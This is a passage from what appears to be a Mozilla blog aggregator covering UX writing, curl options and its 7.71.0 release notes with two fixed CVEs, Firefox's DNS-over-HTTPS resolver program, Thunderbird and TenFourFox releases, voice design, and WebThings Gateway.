A video clip shows the installation process for an extension, which includes a button to add it to Firefox, then a doorhanger that asks the user to confirm they want to add it, a message confirming it has been added, and then another message notifying user when the browser takes action (in this case changing a new tab to an image of a cat).

The installation flow for the browser extension, Tabby Cat, demonstrates the changing nature of UX copy. Co-created with designer Emanuela Damiani.


5. Form is considered

Poetry communicates through language, but also through visual presentation. Unlike a novel, where words can run from page to page like water, a poet conducts flow more tightly in its physical space. Line breaks are chosen with intention. A poem can sit squat, crisp and contained as a haiku, or expand like Allen Ginsburg’s Howl across the page, mirroring the wild discontent of the counterculture movement it captures.

Product copy is also conscious of space, and uses it to communicate a message. We parse and prioritize UX copy into headers and subheadings. We chunk explanatory content into paragraphs and bullet points to make the content more consumable.

Screenshot of the Firefox Notes extension welcome screen. Includes larger welcome text and instructions in in bullet points on how to use the app.

The introductory note for the Firefox Notes extension uses type size, bold text, and bullet points to organize the instructions and increase scannability.


6. Meaning can trump grammar

Poetry often plays with the rules of grammar. Words can be untethered from sentences, floating off across the page. Sentences are uncontained with no periods, frequently enjambed.

 Excerpt of "i carry your heart with me(i carry it in" by E. E. Cummings floats in a white box: "i carry your heart with me(i carry it in my heart)i am never without it(anywhere i go you go,my dear;and whatever is done by only me is your doing,my darling)"

Excerpt: “[i carry your heart with me(i carry it in]” by E. E. Cummings

 

In product writing, we also play with grammar. We assign different rules to text elements for purposes of clarity — for example, allowing fragments for form labels and radio buttons. While poetry employs these devices to make meaning, product writing bends or breaks grammar rules so content doesn’t get in the way of meaning — excessive punctuation and title case can slow a reader down, for example.

“While mechanics and sentence structure are important, it’s more important that your writing is clear, helpful, and appropriate for each situation.” — Michael Metts and Andy Welfle, Writing is Designing


Closing thoughts, topped with truffle foam

While people come to this growing profession from different fields, there’s no “right” one that makes you a good UX writer.

As we continue to define and professionalize the practice, it’s useful to reflect on what we can incorporate from our origin fields. In the case of poetry, key points are constraint and consideration. Both poet and product writer often have a small amount of space to move the audience — emotionally, as is the case for poetry, and literally as is the case for product copy.

If we consider the metaphor of baking, a novel would be more like a Thanksgiving meal. You have many hours and dishes to choreograph an experience. Many opportunities to get something wrong or right. A poem, and a piece of product copy, have just one chance to make an impression and do their work.

In this way, poetry and product copy are more like a single scallop served at a Michelin restaurant — but one that has been marinated in carefully chosen spices, and artfully arranged with a puff of lemon truffle foam and Timut pepper reduction. Each element in this tiny concert of flavors carefully, painstakingly composed.

 

Acknowledgements

Thank you to Michelle Heubusch and Betsy Mikel for your review.

Daniel Stenbergcurl ootw: –remote-time

Previous command line options of the week.

--remote-time is a boolean flag using the -R short option. This option was added to curl 7.9 back in September 2001.

Downloading a file

One of the most basic curl use cases is “downloading a file”. When the URL identifies a specific remote resource and the command line transfers the data of that resource to the local file system:

curl https://example.com/file -O

This command line will then copy every single byte of that file and create a duplicated resource locally – with a time stamp using the current time. Having this time stamp as a default seems natural as it was created just now and it makes it work fine with other options such as --time-cond.

Use the remote file’s time stamp please

There are times when you rather want the download to get the exact same modification date and time as the remote file has. We made --remote-time do that.

By adding this command line option, curl will figure out the exact date and time of the remote file and set that same time stamp on the file it creates locally.

This option works with several protocols, including FTP, but there are and will be many situations in which curl cannot figure out the remote time – sometimes simply because the server won’t tell – and then curl will simply not be able to copy the time stamp and it will instead keep the current date and time.

Not be default

This option is not by default because.

  1. curl mimics known tools like cp which creates a new file stamp by default.
  2. For some protocols it requires an extra operation which then can be avoided if the time stamp isn’t actually used for anything.

Combine this with…

As mentioned briefly above, the --remote-time command line option can be really useful to combine with the --time-cond flag. An example of a practical use case for this is a command line that you can invoke repeatedly, but only downloads the new file in case it was updated remotely since the previous time it was downloaded! Like this:

curl --remote-name --time-cond cacert.pem https://curl.haxx.se/ca/cacert.pem

This particular example comes from the curl’s CA extract web page and downloads the latest Mozilla CA store as a PEM file.

Mark BannerThunderbird Conversations 3.1 Released

Thunderbird Conversations is an add-on for Thunderbird that provides a conversation view for messages. It groups message threads together, including those stored in different folders, and allows easier reading and control for a more efficient workflow.

<figcaption>Conversations’ threaded message layout</figcaption>

Over the last couple of years, Conversations has been largely rewritten to adapt to changes in Thunderbird’s architecture for add-ons. Conversations 3.1 is the result of that effort so far.

<figcaption>Message Controls Menu</figcaption>

The new version will work with Thunderbird 68, and Thunderbird 78 that will be released soon.

<figcaption>Attachment preview area with gallery view available for images.</figcaption>

The one feature that is currently missing after the rewrite is inline quick reply. This has been of lower priority, as we have focussed on being able to keep the main part of the add-on running with the newer versions of Thunderbird. However, now that 3.1 is stable, I hope to be able to start work on a new version of quick reply soon.

More rewriting will also be continuing for the foreseeable future to further support Thunderbird’s new architecture. I’m planning a more technical blog post about this in future.

If you find an issue, or would like to help contribute to Conversations’ code, please head over to our GitHub repository.

The post Thunderbird Conversations 3.1 Released appeared first on Standard8's Blog.

Cameron KaiserTenFourFox FPR24 available

TenFourFox Feature Parity Release 24 final is now available for testing (downloads, hashes, release notes). There are no additional changes other than outstanding security updates. Assuming all goes well, it will go live on Monday afternoon/evening Pacific time.

I don't have a clear direction for FPR25. As I said, a lot of the low hanging fruit is already picked, and some of the bigger projects are probably too big for a single developer trying to keep up with monthly releases (and do not lend themselves well to progressive implementation). I'll do some pondering in the meantime.

The Mozilla BlogMore details on Comcast as a Trusted Recursive Resolver

Yesterday Mozilla and Comcast announced that Comcast was the latest member of Mozilla’s Trusted Recursive Resolver program, joining current partners Cloudflare and NextDNS. Comcast is the first Internet Service Provider (ISP) to become a TRR and this represents a new phase in our DoH/TRR deployment.

What does this mean?

When Mozilla first started looking at how to deploy DoH we quickly realized that it wasn’t enough to just encrypt the data; we had to ensure that Firefox used a resolver which they could trust. To do this, we created the Trusted Recursive Resolver (TRR) program which allowed us to partner with specific resolvers committed to strong policies for protecting user data. We selected Cloudflare as our first TRR (and the current default) because they shared our commitment to user privacy and security because we knew that they were able to handle as much traffic as we could send them. This allowed us to provide secure DNS resolution to as many users as possible but also meant changing people’s resolver to Cloudflare. We know that there have been some concerns about this. In particular:

  • It may result in less optimal traffic routing. Some ISP resolvers cooperate with CDNs and other big services to steer traffic to local servers. This is harder (though not impossible) for Cloudflare to do because they have less knowledge of the local network. Our measurements haven’t shown this to be a problem but it’s still a possible concern.
  • If the ISP is providing value added services (e.g., malware blocking or parental controls) via DNS, then these stop working. Firefox tries to avoid enabling DoH in these cases because we don’t want to break services we know people have opted into, but we know those mechanisms are imperfect.

If we were able to verify that the ISP had strong privacy policies then we could use their resolver instead of a public resolver like Cloudflare. Verifying this would of course require that the ISP deploy DoH — which more and more ISPs are doing — and join our TRR program, which is exactly what Comcast has done. Over the next few months we’ll be experimenting with using Comcast’s DoH resolver when we detect that we are on a Comcast network.

How does it work?

Jason Livingood from Comcast and I have published an Internet-Draft describing how resolver selection works, but here’s the short version of what we’re going to be experimenting with. Note: this is all written in the present tense, but we haven’t rolled the experiment out just yet, so this isn’t what’s happening now. It’s also US only, because this is the only place where we have DoH on by default.

First, Comcast inserts a new DNS record on their own recursive resolver for a “special use” domain called doh.test with a value of doh-discovery.xfinity.com The meaning of this record is just “this network supports DoH and here is the name of the resolver.”

When Firefox joins a network, it uses the ordinary system resolver to look up doh.test. If there’s nothing there, then it just uses the default TRR (currently Cloudflare). However, if there is a record there, Firefox looks it up in an internal list of TRRs. If there is a match to Comcast (or a future ISP TRR) then we use that TRR instead. Otherwise, we fall back to the default.

What’s special about the “doh.test” name is that nobody owns  “.test”; it’s specifically reserved for local use so it’s fine for Comcast to put its own data there. If another ISP were to want to do the same thing, they would populate doh.test with their own resolver name. This means that Firefox can do the same check on every network.

The end result is that if we’re on a network whose resolver is part of our TRR program then we use that resolver. Otherwise we use the default resolver.

What is the privacy impact?

One natural question to ask is how this impacts user privacy? We need to analyze this in two parts.

First, let’s examine the case of someone who only uses their computer on a Comcast network (if you never use a Comcast network, then this has no impact on you). Right now, we would send your DNS traffic to Cloudflare, but the mechanism above would send it to Comcast instead. As I mentioned above, both Comcast and Cloudflare have committed to strong privacy policies, and so the choice between trusted resolvers is less important than it otherwise might be. Put differently: every resolver in the TRR list is trusted, so choosing between them is not a problem.

With that said, we should also look at the technical situation (see here for more thoughts on technical versus policy controls). In the current setting, using your ISP resolver probably results in somewhat less exposure of your data to third parties because the ISP has a number of other — albeit less convenient — mechanisms for learning about your browsing history, such as the IP addresses you are going to and the TLS Server Name Indication field. However, once TLS Encrypted Client Hello starts being deployed, the Server Name Indication will be less useful and so there will be less difference between the cases.

The situation is somewhat more complicated for someone who uses both a Comcast and non-Comcast network. In that case, both Comcast and Cloudflare will see pieces of their browsing history, which isn’t totally ideal and is something we otherwise try to avoid. Our current view is that the advantages of using a trusted local resolver when available outweigh the disadvantages of using multiple trusted resolvers, but we’re still analyzing the situation and our thinking may change as we get more data.

One thing I want to emphasize here is that if you have a DoH resolver you prefer to use, you can set it yourself in Firefox Network Settings and that will override the automatic selection mechanisms.

Bottom Line

As we said when we started working on DoH/TRR deployment two years ago, you can’t practically negotiate with your resolver, but Firefox can do it for you, so we’re really pleased to have Comcast join us as a TRR partner.

The post More details on Comcast as a Trusted Recursive Resolver appeared first on The Mozilla Blog.

Daniel Stenbergbug-bounty reward amounts in curl

A while ago I tweeted the good news that we’ve handed over our largest single monetary reward yet in the curl bug-bounty program: 700 USD. We announced this security problem in association with the curl 7.71.0 release the other day.

Someone responded to me and wanted this clarified: we award 700 USD to someone for reporting a curl bug that potentially affects users on virtually every computer system out there – while Apple just days earlier awarded a researcher 100,000 USD for an Apple-specific security flaw.

The difference in “amplitude” is notable.

A bug-bounty

I think first we should start with appreciating that we have a bug-bounty program at all! Most open source projects don’t, and we didn’t have any program like this for the first twenty or so years. Our program is just getting started and we’re getting up to speed.

Donations only

How can we in the curl project hand out any money at all? We get donations from companies and individuals. This is the only source of funds we have. We can only give away rewards if we have enough donations in our fund.

When we started the bug-bounty, we also rather recently had started to get donations (to our Open Collective fund) and we were careful to not promise higher amounts than we would be able to pay, as we couldn’t be sure how many problems people would report and exactly how it would take off.

The more donations the larger the rewards

Over time it has gradually become clear that we’re getting donations at a level and frequency that far surpasses what we’re handing out as bug-bounty rewards. As a direct result of that, we’ve agreed in the the curl security team to increase the amounts.

For all security reports we get now that end up in a confirmed security advisory, we will increase the handed out award amount – until we reach a level we feel we can be proud of and stand for. I think that level should be more than 1,000 USD even for the lowest graded issues – and maybe ten times that amount for an issue graded “high”. We will however never get even within a few magnitudes of what the giants can offer.

<figcaption>Accumulated curl bug-bounty payouts to date. A so called hockey stick graph.</figcaption>

Are we improving security-wise?

The graph with number of reported CVEs per year shows that we started to get a serious number of reports in 2013 (5 reports) and it also seems to show that we’ve passed the peak. I’m not sure we have enough enough data and evidence to back this up, but I’m convinced we do a lot of things much better in the project now that should help to keep the amount of reports down going forward. In a few years when we look back we can see if I was right.

We’re at mid year 2020 now with only two reports so far, which if we keep this rate will make this the best CVE-year after 2012. This, while we offer more money than ever for reported issues and we have a larger amount of code than ever to find problems in.

<figcaption>Number of CVEs reported for curl distributed over the year of the announcement</figcaption>

The companies surf along

One company suggests that they will chip in and pay for an increased curl bug bounty if the problem affects their use case, but for some reason the problems just never seem to affect them and I’ve pretty much stopped bothering to even ask them.

curl is shipped with a large number of operating systems and in a large number of applications but yet not even the large volume users participate in the curl bug bounty program but leave it to us (and they rarely even donate). Perhaps you can report curl security issues to them and have a chance of a higher reward?

You would possibly imagine that these companies should be keen on helping us out to indirectly secure users of their operating systems and applications, but no. We’re an open source project. They can use our products for free and they do, and our products improve their end products. But if there’s a problem in our stuff, that issue is ours to sort out and fix and those companies can then subsequently upgrade to the corrected version…

This is not a complaint, just an observation. I personally appreciate the freedom this gives us.

What can you do to help?

Help us review code. Report bugs. Report all security related problems you can find or suspect exists. Get your company to sponsor us. Write awesome pull requests that improve curl and the way it does things. Use curl and libcurl in your programs and projects. Buy commercial curl support from the best and only provider of commercial curl support.

The Mozilla BlogComcast’s Xfinity Internet Service Joins Firefox’s Trusted Recursive Resolver Program

Committing to Data Retention and Transparency Requirements That Protect Customer Privacy

Today, Mozilla, the maker of Firefox, and Comcast have announced Comcast as the first Internet Service Provider (ISP) to provide Firefox users with private and secure encrypted Domain Name System (DNS) services through Mozilla’s Trusted Recursive Resolver (TRR) Program. Comcast has taken major steps to protect customer privacy as it works to evolve DNS resolution.

“Comcast has moved quickly to adopt DNS encryption technology and we’re excited to have them join the TRR program,” said Eric Rescorla, Firefox CTO. “Bringing ISPs into the TRR program helps us protect user privacy online without disrupting existing user experiences. We hope this sets a precedent for further cooperation between browsers and ISPs.”

For more than 35 years, DNS has served as a key mechanism for accessing sites and services on the internet. Functioning as the internet’s address book, DNS translates website names, like Firefox.com and xfinity.com, into the internet addresses that a computer understands so that the browser can load the correct website.

Over the last few years, Mozilla, Comcast, and other industry stakeholders have been working to develop, standardize, and deploy a technology called (DoH). DoH helps to protect browsing activity from interception, manipulation, and collection in the middle of the network by encrypting the DNS data.

Encrypting DNS data with DoH is the first step. A necessary second step is to require that the companies handling this data have appropriate rules in place – like the ones outlined in Mozilla’s TRR Program. This program aims to standardize requirements in three areas: limiting data collection and retention from the resolver, ensuring transparency for any data retention that does occur, and limiting any potential use of the resolver to block access or modify content. By combining the technology, DoH, with strict operational requirements for those implementing it, participants take an important step toward improving user privacy.

Comcast launched public beta testing of DoH in October 2019. Since then, the company has continued to improve the service and has collaborated with others in the industry via the Internet Engineering Task Force, the Encrypted DNS Deployment Initiative, and other industry organizations around the world. This collaboration also helps to ensure that users’ security and parental control functions that depend on DNS are not disrupted in the upgrade to encryption whenever possible. Also in October, Comcast announced a series of key privacy commitments, including reaffirming its longstanding commitment not to track the websites that customers visit or the apps they use through their broadband connections. Comcast also introduced a new Xfinity Privacy Center to help customers manage and control their privacy settings and learn about its privacy policy in detail.

“We’re proud to be the first ISP to join with Mozilla to support this important evolution of DNS privacy. Engaging with the global technology community gives us better tools to protect our customers, and partnerships like this advance our mission to make our customers’ internet experience more private and secure,” said Jason Livingood, Vice President, Technology Policy and Standards at Comcast Cable.

Comcast is the latest resolver, and the first ISP, to join Firefox’s TRR Program, joining Cloudflare and NextDNS. Mozilla began the rollout of encrypted DNS over HTTPS (DoH) by default for US-based Firefox users in February 2020, but began testing the protocol in 2018.

Adding ISPs in the TRR Program paves the way for providing customers with the security of trusted DNS resolution, while also offering the benefits of a resolver provided by their ISP such as parental control services and better optimized, localized results. Mozilla and Comcast will be jointly running tests to inform how Firefox can assign the best available TRR to each user.

The post Comcast’s Xfinity Internet Service Joins Firefox’s Trusted Recursive Resolver Program appeared first on The Mozilla Blog.

Cameron KaiserThe Super Duper Universal Binary

A question I got repeatedly the last couple days was, now that AARM (Apple ARM) is a thing, is the ultimate ARM-Intel-PowerPC Universal Binary possible? You bet it is! In fact, Apple already documents that you could have a five-way binary, i.e., ARM64, 32-bit PowerPC, 64-bit PowerPC, i386 and x86_64. Just build them separately and lipo them together.

But it's actually more amazing than that because you can have multiple subtypes. Besides generic PPC or PPC64, you can have binaries that run specifically on the G3 (ppc750), G4 (ppc7400 or ppc7450) or G5 (ppc970). The G5 subtype in particular can be 32-bit or 64-bit. I know this is possible because LAMEVMX is already a three-headed binary that selects the non-SIMD G3, AltiVec G4 or special superduper AltiVec G5 version at runtime from a single file. The main reason I don't do this in TenFourFox is that the resulting executable would be ginormous (as in over 500MB in size).

But ARM has an even more dizzying array of subtypes, at least nine, and the Apple ARM in the new AARM Macs will probably be a special subtype of its own. This means that theoretically a Super Duper Universal Binary ("SDUB") could have all of the following:

  • ppc750
  • ppc7400
  • ppc7450
  • ppc970 (this would work for both 32-bit and 64-bit on the G5)
  • i386
  • x86_64
  • x86_64h (i.e., Haswell, here's an example, thanks Markus Stange for pointing this out)
  • armv4t
  • armv5
  • armv6
  • armv6m
  • armv7
  • armv7em
  • armv7k
  • armv7m
  • armv7s
  • whatever AARM Macs turn out to be

That's potentially a 17-way binary. The best part is that each individual subpart can link against a different Mac OS X/macOS SDK, so the PowerPC subportions could be linked against 10.4, the i386 subportion against anything from 10.4 through 10.6, the x86_64 subportion against 10.4 through 10.15 (+/- the Haswell subtype), the various weirdo ARM subportions against whatever macOS SDK is relevant to the corresponding iOS version, and the AARM Mac-specific subportion against 11.0. It may be necessary to lipo it together in multiple stages using multiple machines or Xcodes depending on which subtypes are known to that platform, but after you do that, code-sign and/or notarize you should have the ultimate Super Duper Universal Binary able to run on any of these systems. Now, there's a challenge for someone. I look forward to one of those Developer Transition Kits getting put to good use here.

The Mozilla BlogImmigrants Remain Core to the U.S.’ Strength

By its very design the internet has accelerated the sharing of ideas and information across borders, languages, cultures and time zones. Despite the awesome reach and power of what the web has enabled, there is still no substitute for the chemistry that happens when human beings of different backgrounds and experiences come together to live and work in the same community.

Immigration brings a wealth of diverse viewpoints, drives innovation and creative thinking, and is central to building the internet into a global public resource that is open and accessible to all.

This is why the current U.S. administration’s recent actions are so troubling. On June 22, 2020 President Donald Trump issued an Executive Order suspending entry of immigrants under the premise that they present a risk to the United States’ labor market recovery from the COVID-19 pandemic. This decision will likely have far-reaching and unintended consequences for industries like Mozilla’s and throughout the country.

Technology companies, including Mozilla, rely on brilliant minds from around the globe. This mix of people and ideas has generated significant technological advances that currently fuel our global economy and will undoubtedly be essential for future economic recovery and growth.

This is also why we’re eager to see lawmakers create a permanent solution for (DACA (Deferred Action for Childhood Arrivals). We hope that in light of the recent U.S. Supreme Court ruling, the White House does not continue to pursue plans to end the program that currently protects about 700,000 young immigrants known as Dreamers from deportation. These young people were brought to the U.S. as minors, and raised and educated here. We’ve made this point before, but it bears repeating: Breaking the promise made to these young people and preventing these future leaders from having a legal pathway to citizenship is short-sighted and morally wrong. We owe it to them and to the country to give them every opportunity to succeed here in the U.S.

Immigrants have been a core part of the United States’ strength since its inception. A global pandemic hasn’t changed that. At a time when the United States is grappling with how to make right so many of the wrongs of its past, the country can’t afford to double down on policies that shut out diverse voices and contributions of people from around the world. As they have throughout the country’s history, our immigrant family members, friends, neighbors and colleagues must be allowed to continue playing a vital role in moving the U.S. forward.

The post Immigrants Remain Core to the U.S.’ Strength appeared first on The Mozilla Blog.

The Firefox FrontierCelebrate Pride with these colorful browser themes for Firefox

As June comes to a close, we wanted to share some of our favorite LGBTQ browser themes, so you can celebrate Pride well into the summer and beyond. Gay Pride … Read more

The post Celebrate Pride with these colorful browser themes for Firefox appeared first on The Firefox Frontier.

The Mozilla BlogWe’re proud to join #StopHateForProfit

Mozilla stands with the family of companies and civil society groups calling on Facebook to take strong action to limit hateful and divisive content on their platforms. Mozilla and Firefox have not advertised on Facebook and Instagram since March of 2018, when it became clear the company wasn’t acting to improve the lack of user privacy that emerged in the Cambridge Analytica scandal.

This is a crucial time for democracy, and internet platforms must play a constructive role. That means protecting people’s privacy and not becoming a willing vehicle for misinformation, hate, and lies. Now is the time for action, and we call upon Facebook to be on the right side of history.

The post We’re proud to join #StopHateForProfit appeared first on The Mozilla Blog.

Firefox UXDesigning for voice

In the future people will use their voice to access the internet as often as they use a screen. We’re already in the early stages of this trend: As of 2016 Google reported 20% of searches on mobile devices used voice, last year smart speakers sales topped 146 million units — a 70% jump from 2018, and I’m willing to bet your mom or dad have adopted voice to make a phone call or dictate a text message.

I’ve been exploring voice interactions as the design lead for Mozilla’s Emerging Technologies team for the past two years. In that time we’ve developed Pocket Listen (a Text-to-Speech platform, capable of converting any published web article into audio) and Firefox Voice (an experiment accessing the internet with voice in the browser). This blog post is an introduction to designing for voice, based on the lessons our team learned researching and developing these projects. Luckily, if you’re a designer transitioning to working with voice, and you already have a solid design process in place, you’ll find many of your skills transfer seamlessly. But, some things are very different, so let’s dive in.

The benefits of voice

As with any design it’s best to ground the work in the value it can bring people.

The accessibility benefits to a person with a physical impairment should be clear, but voice has the opportunity to aid an even larger population. Small screens are hard to read with aging eyes, typing on a virtual keyboard can be difficult, and understanding complex technology is always a challenge. Voice is emerging as a tool to overcome these limitations, turning cumbersome tasks into simple verbal interactions.

How voice technology can improve the user experience?

As designers, we’re often tasked with creating efficient and effortless interactions. Watch someone play music on a smart speaker and you’ll see how quickly thought turns to action when friction is removed. They don’t have to find and unlock their phone, launch an app, scroll through a list of songs and tap. Requesting a song happens in an instant with voice. A quote from one of our survey respondents summed it up perfectly:

“Being able to talk without thinking. It’s essentially effortless information ingestion.“

When is voice valuable?

When and where voice is likely to be used

Talking out loud to a device isn’t always appropriate or socially acceptable. We see this over and over again in research and real world usage. People are generally uncomfortable talking to devices in public. The more private, the better.

Graph showing Home, In the car, and At a friends house being the top 3 places people are comfortable using voice.

Hands-free and multi-tasking also drive voice usage — cooking, washing the dishes, or driving in a car. These situations present opportunities to use voice because our hands or eyes are otherwise occupied.

But, voice isn’t just used for giving commands. Text-to-Speech can generate content from anything written, including articles. It’s a technology we successfully used to build and deploy Pocket Listen, which allows you to listen to articles you’d saved for later.

Pocket Listen usage Feb 2020, United Kingdom

In the graph above you’ll see that people primarily use Pocket Listen while commuting. By creating a new format to deliver the content, we’ve expanded when and where the product provides value.

Why is designing for voice hard?

Now that you know ‘why’ and ‘when’ voice is valuable, let’s talk about what makes it hard. These are the pitfalls to watch for when building a voice product.

What’s hard about designing for voice?

Voice is still a new technology, and, as such, it can feel open ended. There’s a wide variety of uses and devices it works well with. It can be incorporated using input (Speech-to-Text) or output (Text-to-Speech), with a screen or without a screen. You may be designing with a “Voice first mindset” as Amazon recommends for the Echo Show, or the entire experience might unfold while the phone is buried in someone’s pocket.

In many ways, this kind of divergence is familiar if you’ve worked with mobile apps or responsive design. Personally, the biggest adjustment for me has been the infinite nature of voice. The limited real estate of a screen imposes constraints on the number and types of interactions available. With voice, there’s often no interface to guide an action and it’s more personal than a screen, so request and utterance vary greatly by personality and culture.

In a voice user interface, a person can ask anything and they can ask it a hundred different ways. A list is a great example: on a screen it’s easy to display a handful of options. In a voice interface, listing more than two options quickly breaks down. The user can’t remember the first choice or the exact phrasing they should say if they want to make a selection.

Which brings us to discovery — often cited as the biggest challenge facing voice designers and developers. It’s difficult for a user to know what features are available, what can they say, how do they have to say it? It becomes essential to teach a systems capabilities but difficult in practice. Even when you teach a few key phrases early in the experience, human recall of proper voice commands and syntax is limited. People rarely remember more than a few phrases.

The exciting future of voice

It’s still early days for voice interactions and while the challenges are real, so are the opportunities. Voice brings the potential to deliver valuable new experiences that improve our connections to each other and the vast knowledge available on the internet. These are just a few examples of what I look forward to seeing more of:

“I like that my voice is the interface. When the assistant works well, it lets me do what I wanted to do quickly, without unlocking my phone, opening an app / going on my computer, loading a site, etc.“

As you can see, we’re at the beginning of an exciting journey into voice. Hopefully this intro has motivated you to dig deeper and ask how voice can play a role in one of your projects. If you want to explore more, have questions or just want to chat feel free to get in touch.

Hacks.Mozilla.OrgMozilla WebThings Gateway Kit by OKdo

We’re excited about this week’s news from OKdo, highlighting a new kit built around Mozilla’s WebThings Gateway. OKdo is a UK-based global technology company focused on IoT offerings for hobbyists, educators, and entrepreneurs. Their idea is to make it easy to get a private and secure “web of things” environment up and running in either home or classroom. OKdo chose to build this kit around the Mozilla WebThings Gateway, and we’ve been delighted to work with them on it.

The WebThings Gateway is an open source software distribution focused on privacy, security, and interoperability. It provides a web-based user interface to monitor and control smart home devices, along with a rules engine to automate them. In addition, a data logging subsystem monitors device changes over time. Thanks to extensive contributions from our open source community, you’ll find an add-on system to extend the gateway with support for a wide range of existing smart home products.

With the WebThings Gateway, users always have complete control. You can directly monitor and control your home and devices over the web. In fact, you’ll never have to share data with a cloud service or vendor. This diagram of our architecture shows how it works:

A diagram comparing the features of Mozilla IoT privacy with a more typical cloud-based IoT approach

Mozilla WebThings Gateway Kit details

The Mozilla WebThings Gateway Kit, available now from OKdo, includes:

  • Raspberry Pi 4 and case
  • MicroSD card pre-flashed with Mozilla WebThings Gateway software
  • Power supply
  • “Getting Started Guide” to help you easily get your project up and running

an image of the OKdo Mozilla WebThings Kit

You can find out more about the OKdo kit and how to purchase it for either home or classroom from their website.

To learn more about WebThings, visit Mozilla’s IoT website or join in the discussion on Discourse. WebThings is completely open source. All of our code is freely available on GitHub. We would love to have you join the community by filing issues, fixing bugs, implementing new features, or adding support for new devices. Also, you can help spread the word about WebThings by giving talks at conferences or local maker groups.

The post Mozilla WebThings Gateway Kit by OKdo appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl 7.71.0 – blobs and retries

Welcome to the “prose version” of the curl 7.71.0 change log. There’s just been eight short weeks since I last blogged abut a curl release but here we are again and there’s quite a lot to say about this new one.

Presentation

Numbers

the 192nd release
4 changes
56 days (total: 8,132)

136 bug fixes (total: 6,209)
244 commits (total: 25,911)
0 new public libcurl function (total: 82)
7 new curl_easy_setopt() option (total: 277)

1 new curl command line option (total: 232)
59 contributors, 33 new (total: 2,202)
33 authors, 17 new (total: 803)
2 security fixes (total: 94)
1,100 USD paid in Bug Bounties

Security

CVE-2020-8169 Partial password leak over DNS on HTTP redirect

This is a nasty bug in user credential handling when doing authentication and HTTP redirects, which can lead to a part pf the password being prepended to the host name when doing name resolving, thus leaking it over the network and to the DNS server.

This bug was reported and we fixed it in public – and then someone else pointed out the security angle of it! Just shows my lack of imagination. As a result, even though this was a bug already reported – and fixed – and therefor technically not subject for a bug bounty, we decide to still reward the reporter, just maybe not with the full amount this would otherwise had received. We awarded the reporter 400 USD.

CVE-2020-8177 curl overwrite local file with -J

When curl -J is used it doesn’t work together with -i and there’s a check that prevents it from getting used. The check was flawed and could be circumvented, which the effect that a server that provides a file name in a Content-Disposition: header could overwrite a local file, since the check for an existing local file was done in the code for receiving a body – as -i wasn’t supposed to work… We awarded the reporter 700 USD.

Changes

We’re counting four “changes” this release.

CURLSSLOPT_NATIVE_CA – this is a new (experimental) flag that allows libcurl on Windows, built to use OpenSSL to use the Windows native CA store when verifying server certificates. See CURLOPT_SSL_OPTIONS. This option is marked experimental as we didn’t decide in time exactly how this new ability should relate to the existing CA store path options, so if you have opinions on this you know we’re interested!

CURLOPT-BLOBs – a new series of certificate related options have been added to libcurl. They all take blobs as arguments, which are basically just a memory area with a given size. These new options add the ability to provide certificates to libcurl entirely in memory without using files. See for example CURLOPT_SSLCERT_BLOB.

CURLOPT_PROXY_ISSUERCERT – turns out we were missing the proxy version of CURLOPT_ISSUERCERT so this completed the set. The proxy version is used for HTTPS-proxy connections.

--retry-all-errors is the new blunt tool of retries. It tells curl to retry the transfer for all and any error that might occur. For the cases where just --retry isn’t enough and you know it should work and retrying can get it through.

Interesting bug-fixes

This is yet another release with over a hundred and thirty different bug-fixes. Of course all of them have their own little story to tell but I need to filter a bit to be able to do this blog post. Here are my collected favorites, in no particular order…

  • Bug-fixed happy eyeballs– turns out the happy eyeballs algorithm for doing parallel dual-stack connections (also for QUIC) still had some glitches…
  • Curl_addrinfo: use one malloc instead of three – another little optimize memory allocation step. When we allocate memory for DNS cache entries and more, we now allocate the full struct in a single larger allocation instead of the previous three separate smaller ones. Another little cleanup.
  • options-in-versions – this is a new document shipped with curl, listing exactly which curl version added each command line option that exists today. Should help everyone who wants their curl-using scripts to work on their uncle’s ancient setup.
  • dynbuf – we introduced a new internal generic dynamic buffer functions to cake care of dynamic buffers, growing and shrinking them. We basically simplified and reduced the number of different implementations into a single one with better checks and stricter controls. The internal API is documented.
  • on macOS avoid DNS-over-HTTPS when given a numerical IP address – this bug made for example FTP using DoH fail on macOS. The reason this is macOS-specific is that it is the only OS on which we call the name resolving functions even for numerical-only addresses.
  • http2: keep trying to send pending frames after req.upload_done – HTTP/2 turned 5 years old in May 2020 but we can still find new bugs. This one was a regression that broke uploads in some conditions.
  • qlog support – for the HTTP/3 cowboys out there. This makes curl generate QUIC related logs in the directory specified with the environment variable QLOGDIR.
  • OpenSSL: have CURLOPT_CRLFILE imply CURLSSLOPT_NO_PARTIALCHAIN – another regression that had broken CURLOPT_CRLFILE. Two steps forward, one step back.
  • openssl: set FLAG_TRUSTED_FIRST unconditionally – with this flag set unconditionally curl works around the issue with OpenSSL versions before 1.1.0 when it would have problems if there are duplicate trust chains and one of the chains has an expired cert. The AddTrust issue.
  • fix expected length of SOCKS5 reply – my recent SOCKS overhaul and improvements brought this regression with SOCKS5 authentication.
  • detect connection close during SOCKS handshake – the same previous overhaul also apparently made the SOCKS handshake logic not correctly detect closed connection, which could lead to busy-looping and using 100% CPU for a while…
  • add https-proxy support to the test suite – Finally it happened. And a few new test cases for it was also then subsequently provided.
  • close connection after excess data has been read – a very simple change that begged the question why we didn’t do it before! If a server provides more data than what it originally told it was gonna deliver, the connection is one marked for closure and won’t be re-used. Such a re-use would usually just fail miserably anyway.
  • accept “any length” credentials for proxy auth – we had some old limits of 256 byte name and password for proxy authentication lingering for no reason – and yes a user ran into the limit. This limit is now gone and was raised to… 8MB per input string.
  • allocate the download buffer at transfer start– just more clever way to allocate (and free) the download buffers, to only have them around when they’re actually needed and not longer. Helps reducing the amount of run-time memory curl needs and uses.
  • accept “::” as a valid IPv6 address – the URL parser was a tad bit too strict…
  • add SSLKEYLOGFILE support for wolfSSLSSLKEYLOGFILE is a lovely tool to inspect curl’s TLS traffic. Now also available when built with wolfSSL.
  • enable NTLM support with wolfSSL – yeps, as simple as that. If you build curl with wolfSSL you can now play with NTLM and SMB!
  • move HTTP header storage to Curl_easy from connectdata – another one of those HTTP/2 related problems that surprised me still was lingering. Storing request-related data in the connection-oriented struct is a bad idea as this caused a race condition which could lead to outgoing requests with mixed up headers from another request over the same connection.
  • CODE_REVIEW: how to do code reviews in curl – thanks to us adding this document, we could tick off the final box and we are now at gold level
  • leave the HTTP method untouched in the set.* struct – when libcurl was told to follow a HTTP redirect and the response code would tell libcurl to change that the method, that new method would be set in the easy handle in a way so that if the handle was re-used at that point, the updated and not the original method would be used – contrary to documentation and how libcurl otherwise works.
